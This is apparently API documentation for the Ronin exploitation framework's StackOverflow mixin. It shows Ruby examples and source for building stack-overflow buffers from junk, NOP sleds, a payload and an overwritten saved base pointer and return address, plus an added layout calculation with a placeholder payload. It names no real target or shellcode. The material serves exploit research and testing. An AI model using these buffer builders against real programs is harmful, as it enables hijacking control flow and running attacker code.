Module: Ronin::Exploits::Mixins::StackOverflow
- Included in: StackOverflow
- Defined in: lib/ronin/exploits/mixins/stack_overflow.rb
Overview
Methods for building Stack Overflow buffers.
Example
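    include Mixins::StackOverflow

    def build
      ebp = 0x06eb9090  # value written over the saved base pointer
      eip = 0x1001ae86  # value written over the saved return address

      # length: is the size of the whole buffer, stack frame included
      buffer = buffer_overflow(length: 1024, nops: 16, payload: payload, bp: ebp, ip: eip)
      # ...
    end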
If you want more control over how the buffer is constructed:
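    include Mixins::StackOverflow

    def build
      ebp = 0x06eb9090  # value written over the saved base pointer
      eip = 0x1001ae86  # value written over the saved return address

      # Assembled by hand: 1024 bytes of junk, then the nops, payload and frame
      buffer = junk(1024) + nops(16) + payload + stack_frame(ebp,eip)
      # ...
    end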
Constant Summary
Constants included from NOPS
Instance Method Summary
- #buffer_overflow(length:, nops: nil, payload:, bp:, ip:) ⇒ String
  Builds the stack overflow buffer containing the payload, nops, and a stack frame.
- #stack_frame(bp, ip) ⇒ String
  Creates a new stack frame.
Methods included from Text
Methods included from NOPS
#nop, #nops, #perform_validate
Methods included from Binary
#pack, #perform_validate, #platform
Instance Method Details
#buffer_overflow(length:, nops: nil, payload:, bp:, ip:) ⇒ String
Builds the stack overflow buffer containing the payload, nops, and a stack frame.
    # File 'lib/ronin/exploits/mixins/stack_overflow.rb', line 109

    def buffer_overflow(length: , nops: nil, payload: , bp: , ip: )
      payload = payload.to_s
      payload = self.nops(nops) + payload if nops

      stack_frame = self.stack_frame(bp,ip)

      buffer = String.new(encoding: Encoding::ASCII_8BIT)
      buffer << junk(length - payload.bytesize - stack_frame.bytesize)
      buffer << payload
      buffer << stack_frame
      return buffer
    end
#stack_frame(bp, ip) ⇒ String
Creates a new stack frame.
    # File 'lib/ronin/exploits/mixins/stack_overflow.rb', line 77

    def stack_frame(bp,ip)
      pack(:machine_word,bp) + pack(:machine_word,ip)
    end
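The layout that #buffer_overflow produces, worked through as an added Ruby example that is not part of Ronin: `length` is the total buffer size, so the stack frame is the last two machine words and the junk shrinks to make room for the nops and payload. The helper names, the 4-byte little-endian word, the single-byte 0x90 NOP and the 0xCC placeholder payload are assumptions, and the guard against a negative junk length is not in the source shown above.

```ruby
# Added illustration, not Ronin code. Assumes a 32-bit little-endian target
# (4-byte machine word) and single-byte 0x90 NOPs; all names are hypothetical.
WORD = 4

# Region map for a buffer laid out as junk | nops | payload | bp | ip,
# where `length` is the total size, as in the buffer_overflow source.
def overflow_layout(length:, nops: 0, payload_size:)
  frame = 2 * WORD
  junk  = length - nops - payload_size - frame
  # The arithmetic in the documented method has no guard for this case.
  raise ArgumentError, "nops + payload + frame exceed #{length} bytes" if junk < 0

  sizes  = { junk: junk, nops: nops, payload: payload_size, bp: WORD, ip: WORD }
  offset = 0
  sizes.to_h do |name, size|
    region = [name, { offset: offset, size: size }]
    offset += size
    region
  end
end

# Assemble a buffer with that layout from placeholder bytes.
def build_sample(length:, nops:, payload:, bp:, ip:)
  map = overflow_layout(length: length, nops: nops, payload_size: payload.bytesize)
  buf = String.new(encoding: Encoding::ASCII_8BIT)
  buf << ("A" * map[:junk][:size]).b   # filler
  buf << ("\x90".b * nops)             # NOP region
  buf << payload.b
  buf << [bp, ip].pack("VV")           # two little-endian 32-bit words
end

# Read the base pointer and return address values back out of the tail.
def trailing_frame(buffer)
  buffer.byteslice(-2 * WORD, 2 * WORD).unpack("VV")
end

PLACEHOLDER = ("\xCC".b * 32).freeze   # constructed stand-in, not a real payload
SAMPLE = build_sample(length: 1024, nops: 16, payload: PLACEHOLDER,
                      bp: 0x06eb9090, ip: 0x1001ae86)
```

With the page's `length: 1024` and `nops: 16` and a 32-byte payload, the junk region is 968 bytes and the frame starts at offset 1016.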